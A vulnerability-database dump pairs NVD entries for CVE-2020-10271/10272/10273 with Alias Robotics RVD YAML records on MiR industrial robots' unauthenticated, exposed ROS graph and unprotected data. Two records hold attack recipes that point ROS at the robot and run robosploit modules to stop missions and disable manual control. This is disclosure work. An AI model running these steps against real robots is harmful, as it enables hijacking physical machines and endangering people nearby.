```yaml id: 2555 title: 'RVD#2555: MiR ROS computational graph is exposed to all network interfaces, including poorly secured wireless networks and open wired ones' type: vulnerability description: MiR100, MiR200 and other MiR robots use the Robot Operating System (ROS) default packages exposing the computational graph to all network interfaces, wireless and wired. This is the result of a bad set up and can be mitigated by appropriately configuring ROS and/or applying custom patches as appropriate. Currently, the ROS computational graph can be accessed fully from the wired exposed ports. In combination with other flaws such as CVE-2020-10269, the computation graph can also be fetched and interacted from wireless networks. This allows a malicious operator to take control of the ROS logic and correspondingly, the complete robot given that MiR's operations are centered around the framework (ROS). cwe: CWE-668 cve: CVE-2020-10271 keywords: - MiR100, MiR200, MiR500, MiR250, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD system: MiR100:v2.8.1.1 and before, MiR200, MiR250, MiR500, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD vendor: Mobile Industrial Robots A/S, EasyRobotics, Enabled Robotics, UVD Robots severity: rvss-score: 8.0 rvss-vector: RVSS:1.0/AV:IN/AC:L/PR:N/UI:N/S:C/Y:Z/C:H/I:H/A:H/H:H/ severity-description: high cvss-score: 10.0 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H links: - https://cwe.mitre.org/data/definitions/668.html - https://github.com/aliasrobotics/RVD/issues/2555 flaw: phase: testing specificity: robotics-specific architectural-location: platform code application: ROS subsystem: cognition:ros package: N/A languages: N/A date-detected: 2020-04-20 detected-by: "Victor Mayoral Vilches, Alfonso Glera, Lander Usategui, Unai Ayucar, Xabier Saez de Camara (Alias Robotics)" detected-by-method: testing-dynamic:alurity date-reported: '2020-06-24' reported-by: "Victor Mayoral Vilches (Alias Robotics)" reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/2555 reproducibility: always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: networks: - network: - driver: overlay - name: mireth-network - encryption: false containers: - container: - name: mir100 - modules: - base: registry.gitlab.com/aliasrobotics/offensive/alurity/robo_mir100:2.8.1.1 - network: mireth-network - container: - name: attacker - modules: - base: registry.gitlab.com/aliasrobotics/offensive/alurity/comp_ros:melodic - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/expl_robosploit/expl_robosploit:latest - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom:latest - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_nmap:latest - network: mireth-network flow: - container: - name: attacker - window: - name: attacker - commands: - command: 'export TARGET=$(nslookup mir100 | awk "NR==6{print$2}" | sed "s/Address: //g")' - command: export PYTHONPATH="/opt/ros/melodic/lib/python2.7/dist-packages" - command: export ROS_MASTER_URI="http://$TARGET:11311" - command: echo "Give ROS setup some time to finalize launching..."; sleep 20 - command: source /opt/ros/melodic/setup.bash - command: rosnode list - command: echo "#####################" - command: echo "Initiating attack" - command: echo "#####################" - command: export PYTHONPATH="/opt/ros/melodic/lib/python2.7/dist-packages:/opt/robosploit/lib/python3.6/site-packages:/opt/robosploit/lib/python3.6/site-packages" - command: echo " Exploiting the computational graph directly" - command: echo " Updating first dependencies" - command: pip3 install rospkg - command: robosploit -m exploits/mir/ros/tunes -s "target $TARGET" - container: - name: mir100 - window: - name: setup - commands: - command: mkdir /var/run/sshd - command: /usr/sbin/sshd - command: /bin/sleep 5 - command: sudo mkdir /run/lock - command: /etc/init.d/apache2 start - split: horizontal - command: /bin/sleep 2 - command: python /usr/local/mir/software/robot/release/db_backup.py - command: /etc/init.d/mysql start - command: /bin/sleep 2 - command: /usr/sbin/mysqld --verbose & - window: - name: ros - commands: - command: 'export MYIP=$(nslookup mir100 | awk "NR==6{print$2}" | sed "s/Address: //g")' - command: export ROS_IP=$MYIP - command: export ROS_MASTER_URI="http://$MYIP:11311" - command: python /usr/local/mir/software/robot/release/db_backup.py - command: sudo apt-key adv --keyserver 'hkp://keyserver.ubuntu.com:80' --recv-key C1CF6E31E6BADE8868B172B4F42ED6FBAB17C654 - command: sudo apt-get update - command: roslaunch mirCommon mir_bringup.launch - select: setup - attach: attacker mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#2555: MiR ROS computational graph is exposed to all network interfaces, including poorly secured wireless networks and open wired ones
https://api.github.com/repos/aliasrobotics/RVD/issues/2555/comments
0
2020-06-24T04:34:30Z
2020-07-10T06:38:04Z
https://github.com/aliasrobotics/RVD/issues/2555
644,310,466
2,555
1,310
CVE-2020-10272
2020-06-24T05:15:12.943
MiR100, MiR200 and other MiR robots use the Robot Operating System (ROS) default packages exposing the computational graph without any sort of authentication. This allows attackers with access to the internal wireless and wired networks to take control of the robot seamlessly. In combination with CVE-2020-10269 and CVE-2020-10271, this flaw allows malicious actors to command the robot at desire.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 6, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2554" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2554" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "BBDEDA2D-26AB-4F23-B672-D0C89A7BEFB9", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir100:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0989373-02AB-4E05-BAC2-0522A641D73A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "78E261B1-C56F-4428-9D53-5BBCCACEAFCF", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir200:-:*:*:*:*:*:*:*", "matchCriteriaId": "7BF40B1F-0DD2-4B8A-BFBA-A7E641DC3316", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir250_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "877EEDC4-E86F-420D-81C6-3F632C787003", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir250:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1AE2A0-D83D-441B-856B-7E6FAB065C0D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "335CA5FE-5AFD-4D49-9A88-1CD71C9281BE", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir500:-:*:*:*:*:*:*:*", "matchCriteriaId": "F57611E0-5CB2-40FD-8420-ED13A1C4863F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir1000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "6865A559-8CA9-4F51-AC43-35BDF5201B91", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "04043B16-E401-4D2C-9812-71923CEA2716", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robotics:er200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "39BD42AA-95E1-4A02-BB9D-C54AE6BAF9B2", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robotics:er200:-:*:*:*:*:*:*:*", "matchCriteriaId": "D8A47E5E-7754-47EA-B02D-8A7F54124ED4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-lite_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "DF0E5CFB-6C15-4BB1-97D8-DD52F68190DD", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-lite:-:*:*:*:*:*:*:*", "matchCriteriaId": "472A560B-547D-4C9F-BE86-ED602FA32799", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-flex_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "D5528AFD-75DF-4296-9A29-4BD00AB76273", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-flex:-:*:*:*:*:*:*:*", "matchCriteriaId": "654488E4-161E-40B5-9E0B-BE68F5F38E91", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-one_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "CD6E62F4-9C15-49AA-BFB7-81443D40B9B9", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-one:-:*:*:*:*:*:*:*", "matchCriteriaId": "1BB77317-78C0-4800-8E1D-498979B6CB06", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:uvd-robots:uvd_robots_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "A7452D74-36A5-4C87-AA20-8E9A80724EAA", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:uvd-robots:uvd_robots:-:*:*:*:*:*:*:*", "matchCriteriaId": "4FD4ACEB-1184-47AB-86E4-732DA183E8AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "306" ]
306
https://github.com/aliasrobotics/RVD/issues/2554
[ "Exploit", "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 2554 title: 'RVD#2554: MiR ROS computational graph presents no authentication mechanisms' type: vulnerability description: MiR100, MiR200 and other MiR robots use the Robot Operating System (ROS) default packages exposing the computational graph without any sort of authentication. This allows attackers with access to the internal wireless and wired networks to take control of the robot seamlessly. In combination with CVE-2020-10269 and CVE-2020-10271, this flaw allows malicious actors to command the robot at desire. cwe: CWE-306 cve: CVE-2020-10272 keywords: - MiR100 - MiR200 - MiR500 - MiR250 - MiR1000 - ER200 - ER-Lite - ER-Flex - ER-One - UVD system: MiR100:v2.8.1.1 and before, MiR200, MiR250, MiR500, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD vendor: Mobile Industrial Robots A/S, EasyRobotics, Enabled Robotics, UVD Robots severity: rvss-score: 8.0 rvss-vector: RVSS:1.0/AV:IN/AC:L/PR:N/UI:N/S:C/Y:Z/C:H/I:H/A:H/H:H/MAV:L/MAC:L/MPR:L/MUI:N/MC:H/MI:H/MA:H/ severity-description: high cvss-score: 10.0 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H links: - https://cwe.mitre.org/data/definitions/306.html - https://github.com/aliasrobotics/RVD/issues/2554 flaw: phase: runtime-operation specificity: robotics-specific architectural-location: platform code application: ROS subsystem: cognition:ros package: N/A languages: N/A date-detected: 2020-04-20 detected-by: "Victor Mayoral Vilches, Alfonso Glera, Lander Usategui, Unai Ayucar, Xabier Saez de Camara (Alias Robotics)" detected-by-method: testing-dynamic:alurity date-reported: '2020-06-24' reported-by: Victor Mayoral Vilches, Alfonso Glera (Alias Robotics) reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/2554 reproducibility: always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: networks: - network: - driver: overlay - name: mireth-network - encryption: false containers: - container: - name: mir100 - modules: - base: registry.gitlab.com/aliasrobotics/offensive/alurity/robo_mir100:2.8.1.1 - network: mireth-network - container: - name: attacker - modules: - base: registry.gitlab.com/aliasrobotics/offensive/alurity/comp_ros:melodic - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/expl_robosploit/expl_robosploit:latest - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom:latest - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_nmap:latest - network: mireth-network flow: - container: - name: attacker - window: - name: attacker - commands: - command: 'export TARGET=$(nslookup mir100 | awk "NR==6{print$2}" | sed "s/Address: //g")' - command: export PYTHONPATH="/opt/ros/melodic/lib/python2.7/dist-packages" - command: export ROS_MASTER_URI="http://$TARGET:11311" - command: echo "Give ROS setup some time to finalize launching..."; sleep 20 - command: source /opt/ros/melodic/setup.bash - command: rosnode list - command: export PYTHONPATH="/opt/ros/melodic/lib/python2.7/dist-packages:/opt/robosploit/lib/python3.6/site-packages:/opt/robosploit/lib/python3.6/site-packages" - command: echo " Exploiting the computational graph directly" - command: echo " Updating first dependencies" - command: pip3 install rospkg - command: robosploit -m exploits/mir/ros/stop_mission_disable_manual -s "target $TARGET" - container: - name: mir100 - window: - name: setup - commands: - command: mkdir /var/run/sshd - command: /usr/sbin/sshd - command: /bin/sleep 5 - command: sudo mkdir /run/lock - command: /etc/init.d/apache2 start - split: horizontal - command: /bin/sleep 2 - command: python /usr/local/mir/software/robot/release/db_backup.py - command: /etc/init.d/mysql start - command: /bin/sleep 2 - command: /usr/sbin/mysqld --verbose & - window: - name: ros - commands: - command: 'export MYIP=$(nslookup mir100 | awk "NR==6{print$2}" | sed "s/Address: //g")' - command: export ROS_IP=$MYIP - command: export ROS_MASTER_URI="http://$MYIP:11311" - command: python /usr/local/mir/software/robot/release/db_backup.py - command: sudo apt-key adv --keyserver 'hkp://keyserver.ubuntu.com:80' --recv-key C1CF6E31E6BADE8868B172B4F42ED6FBAB17C654 - command: sudo apt-get update - command: roslaunch mirCommon mir_bringup.launch - select: setup - attach: attacker mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#2554: MiR ROS computational graph presents no authentication mechanisms
https://api.github.com/repos/aliasrobotics/RVD/issues/2554/comments
0
2020-06-24T04:14:56Z
2020-07-10T06:38:04Z
https://github.com/aliasrobotics/RVD/issues/2554
644,304,134
2,554
1,311
CVE-2020-10273
2020-06-24T05:15:13.020
MiR controllers across firmware versions 2.8.1.1 and before do not encrypt or protect in any way the intellectual property artifacts installed in the robots. This flaw allows attackers with access to the robot or the robot network (while in combination with other flaws) to retrieve and easily exfiltrate all installed intellectual property and data.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2560" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2560" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "BBDEDA2D-26AB-4F23-B672-D0C89A7BEFB9", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir100:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0989373-02AB-4E05-BAC2-0522A641D73A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "78E261B1-C56F-4428-9D53-5BBCCACEAFCF", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir200:-:*:*:*:*:*:*:*", "matchCriteriaId": "7BF40B1F-0DD2-4B8A-BFBA-A7E641DC3316", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir250_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "877EEDC4-E86F-420D-81C6-3F632C787003", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir250:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1AE2A0-D83D-441B-856B-7E6FAB065C0D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "335CA5FE-5AFD-4D49-9A88-1CD71C9281BE", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir500:-:*:*:*:*:*:*:*", "matchCriteriaId": "F57611E0-5CB2-40FD-8420-ED13A1C4863F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:aliasrobotics:mir1000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "6865A559-8CA9-4F51-AC43-35BDF5201B91", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:aliasrobotics:mir1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "04043B16-E401-4D2C-9812-71923CEA2716", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robotics:er200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "39BD42AA-95E1-4A02-BB9D-C54AE6BAF9B2", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robotics:er200:-:*:*:*:*:*:*:*", "matchCriteriaId": "D8A47E5E-7754-47EA-B02D-8A7F54124ED4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-lite_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "DF0E5CFB-6C15-4BB1-97D8-DD52F68190DD", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-lite:-:*:*:*:*:*:*:*", "matchCriteriaId": "472A560B-547D-4C9F-BE86-ED602FA32799", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-flex_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "D5528AFD-75DF-4296-9A29-4BD00AB76273", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-flex:-:*:*:*:*:*:*:*", "matchCriteriaId": "654488E4-161E-40B5-9E0B-BE68F5F38E91", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:enabled-robotics:er-one_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "CD6E62F4-9C15-49AA-BFB7-81443D40B9B9", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:enabled-robotics:er-one:-:*:*:*:*:*:*:*", "matchCriteriaId": "1BB77317-78C0-4800-8E1D-498979B6CB06", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:uvd-robots:uvd_robots_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "A7452D74-36A5-4C87-AA20-8E9A80724EAA", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:uvd-robots:uvd_robots:-:*:*:*:*:*:*:*", "matchCriteriaId": "4FD4ACEB-1184-47AB-86E4-732DA183E8AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "312" ]
312
https://github.com/aliasrobotics/RVD/issues/2560
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 2560 title: 'RVD#2560: Unprotected intellectual property in Mobile Industrial Robots (MiR) controllers' type: vulnerability description: MiR controllers across firmware versions 2.8.1.1 and before do not encrypt or protect in any way the intellectual property artifacts installed in the robots. This flaw allows attackers with access to the robot or the robot network (while in combination with other flaws) to retrieve and easily exfiltrate all installed intellectual property and data. cwe: CWE-311 cve: CVE-2020-10273 keywords: - MiR100, MiR200, MiR500, MiR250, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD system: MiR100:v2.8.1.1 and before, MiR200, MiR250, MiR500, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD vendor: Mobile Industrial Robots A/S, EasyRobotics, Enabled Robotics, UVD Robots severity: rvss-score: 6.5 rvss-vector: RVSS:1.0/AV:AN/AC:L/PR:N/UI:N/Y:Z/S:U/C:H/I:N/A:N/H:N severity-description: high cvss-score: 7.5 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N links: - https://cwe.mitre.org/data/definitions/311.html - https://github.com/aliasrobotics/RVD/issues/2560 flaw: phase: runtime-operation specificity: general-issue architectural-location: application-specific application: Ubuntu Linux subsystem: N/A package: N/A languages: N/A date-detected: 2020-04-20 